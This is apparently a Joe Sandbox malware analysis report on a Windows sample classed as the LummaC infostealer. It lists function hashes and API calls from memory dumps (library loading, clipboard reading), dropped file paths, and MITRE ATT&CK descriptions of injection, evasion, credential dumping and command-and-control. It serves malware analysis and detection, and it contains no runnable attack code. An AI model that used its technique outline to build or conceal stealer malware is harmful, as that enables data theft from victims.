Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: 229feb30ae80f4fcd7b66a4fa33ba082750345d1921d587d89a052681118fb94
Instruction ID: b231f60b3ebc2e41c8054612dea4992857990fa47aaa3f124ce0e977163be1ec
Opcode Fuzzy Hash: 229feb30ae80f4fcd7b66a4fa33ba082750345d1921d587d89a052681118fb94
Instruction Fuzzy Hash: 42C1CF30200B918AD735CF29D4947A3BBE1AF1A308F4849AEC4EB8B793D739B445CB54

Function 00436CF7 Relevance: 1.6, APIs: 1, Instructions: 123libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 00436E9A

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6dc3722e462a52be6e3cfd039e7a32e8ec967de6e073168d419bedfd22713313
Instruction ID: fd93a9c42259c6a0376d28ba056e3dc493a6e687240b9595f48140139eb14c4d
Opcode Fuzzy Hash: 6dc3722e462a52be6e3cfd039e7a32e8ec967de6e073168d419bedfd22713313
Instruction Fuzzy Hash: 61513974500B01CBC718DF15ED606267BF2FF9A309B18923DE45647721D734E9A2CB59

Function 00436BFE Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 00436E9A

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a0be5beb091cfb0477f0e6ae7c628f0dec88994d7844b0599b3693b7912d244f
Instruction ID: f8d1393dd67e7ab962e79834e29345ebc53683c65cd37e11f0bbdc815a591bf6
Opcode Fuzzy Hash: a0be5beb091cfb0477f0e6ae7c628f0dec88994d7844b0599b3693b7912d244f
Instruction Fuzzy Hash: F8212578504A02DBC718DF14ED6022677F2FF9A309B18922DE45643B21E734F862CB89

Function 00436EF7 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?), ref: 00436F7B

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5497c368f21ad70b9403c5bdc7527a6f3c1078bcb4d98caece8849e09100b7e3
Instruction ID: 228c468470a2fbc274beecbbeab58c08c74587e579fa3bf81820b2fc61e5d453
Opcode Fuzzy Hash: 5497c368f21ad70b9403c5bdc7527a6f3c1078bcb4d98caece8849e09100b7e3
Instruction Fuzzy Hash: 0B114F75600B02CBC329CF14D960627B3E2FF86310B19D66DD89A47B51C734F881CB84

Function 00436C03 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 00436C85

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 92b5895bfc28467bf44502c32a9a2ecfb2b9d0febed9b27ee0640101612e47ca
Instruction ID: a92a4d145a34abc349fd246716dacd899b29bac716d0eb2c85e4308c05fbe5d0
Opcode Fuzzy Hash: 92b5895bfc28467bf44502c32a9a2ecfb2b9d0febed9b27ee0640101612e47ca
Instruction Fuzzy Hash: D6116D34600B028BD329CF24D9A0766B3E2FF8A305B199A2DC49687A51DB34F856CB44

Function 0043533B Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 004353B4

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2550d5d9237e71244a91bd5b0272c7f2ef18cc7a844229294179ff1680bbbd23
Instruction ID: b2a7c0f45d73baac19d0a62d73711efa9cb8d3fbda8b1144b8240d04d5d89a45
Opcode Fuzzy Hash: 2550d5d9237e71244a91bd5b0272c7f2ef18cc7a844229294179ff1680bbbd23
Instruction Fuzzy Hash: 70112E7020C2808FD719DF14D8A0B2ABBB2EF96704F149A5DD5C58B3A2C7359C16CB5A

Function 0043708D Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043710A

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 24897d326a2c4c305ad3b70255841a5255de5f456d067250c7395233b2650655
Instruction ID: 077f250b11c9a6ae3974aa601e75e7e0aa9b45adb7f059fd5e3b01db2ec103e5
Opcode Fuzzy Hash: 24897d326a2c4c305ad3b70255841a5255de5f456d067250c7395233b2650655
Instruction Fuzzy Hash: A01127341092419BC305AF04C994B1BBBA2FFC5704F25CA5CD0C41B36AD775A856CB8A

Function 0043354C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 0043358D

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 5678f8396b9aeb4f95751d5e3b9aaf77680f673f77c408df0f177e7fb35e3485
Instruction ID: 50cef04d5fdf56c8984f1f8c77284705f1f0b7f0d6fe38464480f231dd356650
Opcode Fuzzy Hash: 5678f8396b9aeb4f95751d5e3b9aaf77680f673f77c408df0f177e7fb35e3485
Instruction Fuzzy Hash: 66F0E5B49183419BC304EF21DD6132EB7E0EF8A308F21C92DF09982250E7748A98CF07

Function 00417F53 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000), ref: 00417F5E

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 5b22b7ede7f927c7e8d3592a5eac21399e2325a7c919a32eb7d935fba86782b9
Instruction ID: 96aad2828abc3f44ccce3070b1df6631be5cfffaa5ee5bf13063a30304b7a7b0
Opcode Fuzzy Hash: 5b22b7ede7f927c7e8d3592a5eac21399e2325a7c919a32eb7d935fba86782b9
Instruction Fuzzy Hash: 41E086795546009BD228DF19BDC5D3B33B9D7CA708F44042DF246C7751CA34AC529764

Function 004352D6 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 004352DC

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ec44d7d430450315a192020973e39c1a95762a9ac11258f9416c8f60f9d21dd1
Instruction ID: 8109f6a8c3c7fcb32c2dbaef12a862517c22d853fc62862c31d686ab216ea9a6
Opcode Fuzzy Hash: ec44d7d430450315a192020973e39c1a95762a9ac11258f9416c8f60f9d21dd1
Instruction Fuzzy Hash: 24D0C938148140CFE6089B10DC05B353266EB46305F24C1AAE802062A2C73198038A4C

Non-executed Functions

Function 0042D100 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042D152
GetWindowInfo.USER32 ref: 0042D177
GetClipboardData.USER32 ref: 0042D187
GlobalLock.KERNEL32 ref: 0042D1A3
GlobalUnlock.KERNEL32 ref: 0042D2C0
CloseClipboard.USER32 ref: 0042D2CA

Strings

O, xrefs: 0042D20F
{, xrefs: 0042D1F3
r, xrefs: 0042D20B
p, xrefs: 0042D1FB

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
String ID: O$p$r${
API String ID: 3829817484-81440836
Opcode ID: b8278e07630927f8861c81aa8551d742060d0495329a7f8086619bc469c196cb
Instruction ID: 66a7c10bbe752aee87ecf3219f80cd0b76630ecfb7e67d9db0581663bfab4258
Opcode Fuzzy Hash: b8278e07630927f8861c81aa8551d742060d0495329a7f8086619bc469c196cb
Instruction Fuzzy Hash: 75616DB4908740CFC720DF38D485716BBE1AF5A310F148AADD8DA8B795D734E805DBA6

Function 00422970 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00422A46
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00422A75

Strings

rnB, xrefs: 00422D1D

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: rnB
API String ID: 237503144-3415737273
Opcode ID: e3384319cacc30bfa9e1d4372162438578abafe1cad0be0556ec7d67e4c38997
Instruction ID: fe5aaba2ab45d7eea4c890fb1bcab427829e50489bbc0e5c9bb5fd1b3f50ea28
Opcode Fuzzy Hash: e3384319cacc30bfa9e1d4372162438578abafe1cad0be0556ec7d67e4c38997
Instruction Fuzzy Hash: 4CA16C315183918BE335CF28D990BAFB7E1FFC5308F450A2DE9995B282D7706906CB86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 86KZvDaOZR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\86KZvDaOZR.exe.log

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Windows Analysis Report
86KZvDaOZR.exe

Function 6CF2B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Function 05860EB3 Relevance: 29.6, Strings: 23, Instructions: 800
COMMON

Function 6CF1B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Function 6CF22970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Function 6CF1AF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Function 6CF2D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Function 6CF2D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Function 6CF244C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Function 6CF2BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Function 6CF264D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Function 6CF2CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Function 6CF1A350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Function 6CF2CD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Function 6CF266A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Function 6CF2840E Relevance: 13.8, APIs: 9, Instructions: 332
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre